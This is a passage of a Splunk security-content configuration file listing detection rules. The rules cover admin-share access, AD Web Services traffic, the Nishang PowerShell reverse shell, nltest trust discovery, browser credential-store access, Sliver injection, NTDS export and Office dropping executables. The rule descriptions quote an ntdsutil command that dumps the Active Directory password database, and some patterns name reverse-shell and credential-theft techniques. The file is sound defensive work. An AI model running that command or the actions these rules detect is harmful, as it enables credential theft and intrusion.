"kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5140 ShareName IN("\\\\*\\ADMIN$","\\\\*\\C$","*\\\\*\\IPC$") AccessMask= 0x1 | stats min(_time) as firstTime max(_time) as lastTime count by ShareName IpAddress ObjectType SubjectUserName SubjectDomainName IpPort AccessMask Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_share_discovery_via_dir_command_filter` [ESCU - Network Traffic to Active Directory Web Services Protocol - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies network traffic to Active Directory Web Services Protocol. This protocol is used to manage Active Directory. The analytic is meant to be tuned and filtered to the specific environment. It will assist defenders in identifying suspicious processes accessing port 9389. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.AE"]} action.escu.data_models = ["Network_Traffic"] action.escu.eli5 = The following analytic identifies network traffic to Active Directory Web Services Protocol. This protocol is used to manage Active Directory. The analytic is meant to be tuned and filtered to the specific environment. It will assist defenders in identifying suspicious processes accessing port 9389. action.escu.how_to_implement = The detection is based on data that originates from network traffic logs. The logs must contain the source and destination IP addresses, the application name, and the destination port. The logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the network traffic data source. The logs must also be mapped to the `Network_Traffic` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as the destination port is specific to Active Directory Web Services Protocol, however we recommend utilizing this analytic to hunt for non-standard processes querying the ADWS port. Filter by App or dest_ip to AD servers and remove known proceses querying ADWS. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Traffic to Active Directory Web Services Protocol - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Windows Discovery Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Traffic to Active Directory Web Services Protocol - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count from datamodel=Network_Traffic where All_Traffic.dest_port=9389 by All_Traffic.src_ip, All_Traffic.dest_ip, All_Traffic.app, All_Traffic.user, All_Traffic.dest_port | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Traffic")` | `network_traffic_to_active_directory_web_services_protocol_filter` [ESCU - Nishang PowershellTCPOneLine - Rule] action.escu = 0 action.escu.enabled = 1 description = This query detects the Nishang Invoke-PowerShellTCPOneLine utility that spawns a call back to a remote Command And Control server. This is a powershell oneliner. In addition, this will capture on the command-line additional utilities used by Nishang. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the powershell process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This query detects the Nishang Invoke-PowerShellTCPOneLine utility that spawns a call back to a remote Command And Control server. This is a powershell oneliner. In addition, this will capture on the command-line additional utilities used by Nishang. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the powershell process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present. Filter as needed based on initial analysis. action.escu.creation_date = 2021-03-03 action.escu.modification_date = 2021-03-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Nishang PowershellTCPOneLine - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["HAFNIUM Group"] action.risk = 1 action.risk.param._risk_message = Possible Nishang Invoke-PowerShellTCPOneLine behavior on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Nishang PowershellTCPOneLine - Rule action.correlationsearch.annotations = {"analytic_story": ["HAFNIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This query detects the Nishang Invoke-PowerShellTCPOneLine utility that spawns a call back to a remote Command And Control server. This is a powershell oneliner. In addition, this will capture on the command-line additional utilities used by Nishang. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the powershell process. action.notable.param.rule_title = Nishang PowershellTCPOneLine action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process=*Net.Sockets.TCPClient* AND Processes.process=*System.Text.ASCIIEncoding*) by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `nishang_powershelltcponeline_filter` [ESCU - NLTest Domain Trust Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for Domain Trust information. Two arguments `/domain trusts`, returns a list of trusted domains, and `/all_trusts`, returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for Domain Trust information. Two arguments `/domain trusts`, returns a list of trusted domains, and `/all_trusts`, returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may use nltest for troubleshooting purposes, otherwise, rarely used. action.escu.creation_date = 2022-04-18 action.escu.modification_date = 2022-04-18 action.escu.confidence = high action.escu.full_search_name = ESCU - NLTest Domain Trust Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware", "Domain Trust Discovery", "IcedID", "Active Directory Discovery", "Qakbot", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Domain trust discovery execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - NLTest Domain Trust Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Domain Trust Discovery", "IcedID", "Active Directory Discovery", "Qakbot", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for Domain Trust information. Two arguments `/domain trusts`, returns a list of trusted domains, and `/all_trusts`, returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next. action.notable.param.rule_title = NLTest Domain Trust Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_nltest` (Processes.process=*/domain_trusts* OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `nltest_domain_trust_discovery_filter` [ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect an anomaly event of a non-chrome process accessing the files in chrome user default folder. This folder contains all the sqlite database of the chrome browser related to users login, history, cookies and etc. Most of the RAT, trojan spy as well as FIN7 jssloader try to parse the those sqlite database to collect information on the compromised host. This SACL Event (4663) need to be enabled to tthe firefox profile directory to be eable to use this. Since you monitoring this access to the folder, we observed noise that needs to be filter out and hence added sqlite db browser and explorer .exe to make this detection more stable. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect an anomaly event of a non-chrome process accessing the files in chrome user default folder. This folder contains all the sqlite database of the chrome browser related to users login, history, cookies and etc. Most of the RAT, trojan spy as well as FIN7 jssloader try to parse the those sqlite database to collect information on the compromised host. This SACL Event (4663) need to be enabled to tthe firefox profile directory to be eable to use this. Since you monitoring this access to the folder, we observed noise that needs to be filter out and hence added sqlite db browser and explorer .exe to make this detection more stable. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = other browser not listed related to firefox may catch by this rule. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = a non firefox browser process $process_name$ accessing $Object_Name$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 NOT (process_name IN ("*\\chrome.exe", "*\\explorer.exe", "*sql*")) Object_Name="*\\Google\\Chrome\\User Data\\Default*" | stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `non_chrome_process_accessing_chrome_default_dir_filter` [ESCU - Non Firefox Process Access Firefox Profile Dir - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect an anomaly event of a non-firefox process accessing the files in the profile folder. This folder contains all the sqlite database of the firefox browser related to users login, history, cookies and etc. Most of the RAT, trojan spy as well as FIN7 jssloader try to parse the those sqlite database to collect information on the compromised host. This SACL Event (4663) needs to be enabled to the firefox profile directory to use this. Since this is monitoring the access to the folder, we have obsevered noise and hence added `sqlite db browser` and `explorer.exe` to make this detection more stable. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect an anomaly event of a non-firefox process accessing the files in the profile folder. This folder contains all the sqlite database of the firefox browser related to users login, history, cookies and etc. Most of the RAT, trojan spy as well as FIN7 jssloader try to parse the those sqlite database to collect information on the compromised host. This SACL Event (4663) needs to be enabled to the firefox profile directory to use this. Since this is monitoring the access to the folder, we have obsevered noise and hence added `sqlite db browser` and `explorer.exe` to make this detection more stable. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." action.escu.known_false_positives = other browser not listed related to firefox may catch by this rule. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Non Firefox Process Access Firefox Profile Dir - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Azorult", "Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = a non firefox browser process $process_name$ accessing $Object_Name$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Non Firefox Process Access Firefox Profile Dir - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 NOT (process_name IN ("*\\firefox.exe", "*\\explorer.exe", "*sql*")) Object_Name="*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles*" | stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `non_firefox_process_access_firefox_profile_dir_filter` [ESCU - Notepad with no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies behavior related to default SliverC2 framework where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage, however may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds." action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies behavior related to default SliverC2 framework where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage, however may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds." action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and filtering may need to occur based on organization endpoint behavior. action.escu.creation_date = 2023-02-22 action.escu.modification_date = 2023-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Notepad with no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BishopFox Sliver Adversary Emulation Framework"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ with no command line arguments. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Notepad with no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BishopFox Sliver Adversary Emulation Framework"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies behavior related to default SliverC2 framework where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage, however may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds." action.notable.param.rule_title = Notepad with no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=notepad.exe AND Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(notepad\.exe.{0,4}$)" | `notepad_with_no_command_line_arguments_filter` [ESCU - Ntdsutil Export NTDS - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Highly possible Server Administrators will troubleshoot with ntdsutil.exe, generating false positives. action.escu.creation_date = 2021-01-28 action.escu.modification_date = 2021-01-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Ntdsutil Export NTDS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "Living Off The Land", "Prestige Ransomware", "Volt Typhoon", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Active Directory NTDS export on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Ntdsutil Export NTDS - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "Living Off The Land", "Prestige Ransomware", "Volt Typhoon", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for signs that Ntdsutil is being used to Extract Active Directory database - NTDS.dit, typically used for offline password cracking. It may be used in normal circumstances with no command line arguments or shorthand variations of more common arguments. Ntdsutil.exe is typically seen run on a Windows Server. Typical command used to dump ntds.dit \ ntdsutil "ac i ntds" "ifm" "create full C:\Temp" q q \ This technique uses "Install from Media" (IFM), which will extract a copy of the Active Directory database. A successful export of the Active Directory database will yield a file modification named ntds.dit to the destination. action.notable.param.rule_title = Ntdsutil Export NTDS action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `ntdsutil_export_ntds_filter` [ESCU - Office Application Drop Executable - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachment where it drop malicious files or script to compromised the host. It might be some normal macro may drop script or tools as part of automation but still this behavior is reallly suspicious and not commonly seen in normal office application action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachment where it drop malicious files or script to compromised the host. It might be some normal macro may drop script or tools as part of automation but still this behavior is reallly suspicious and not commonly seen in normal office application action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = office macro for automation may do this behavior action.escu.creation_date = 2023-02-15 action.escu.modification_date = 2023-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Application Drop Executable - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["FIN7", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "Warzone RAT", "PlugX"] action.risk = 1 action.risk.param._risk_message = process $process_name$ drops a file $file_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Application Drop Executable - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "Warzone RAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious MS office application that drops or creates executables or scripts in a Windows Operating System. This behavior is commonly seen in spear phishing office attachment where it drop malicious files or script to compromised the host. It might be some normal macro may drop script or tools as part of automation but still this behavior is reallly suspicious and not commonly seen in normal office application action.notable.param.rule_title = Office Application Drop Executable action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.exe","*.dll","*.pif","*.scr","*.js","*.vbs","*.vbe","*.ps1") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process process_guid] | dedup file_create_time | table dest, process_name, process, file_create_time, file_name, file_path, process_guid | `office_application_drop_executable_filter` [ESCU - Office Application Spawn Regsvr32 process - Rule] action.escu = 0 action.escu.enabled = 1 description = this detection was designed to identifies suspicious spawned process of known MS office application due to macro or malicious code. this technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this detection was designed to identifies suspicious spawned process of known MS office application due to macro or malicious code. this technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to 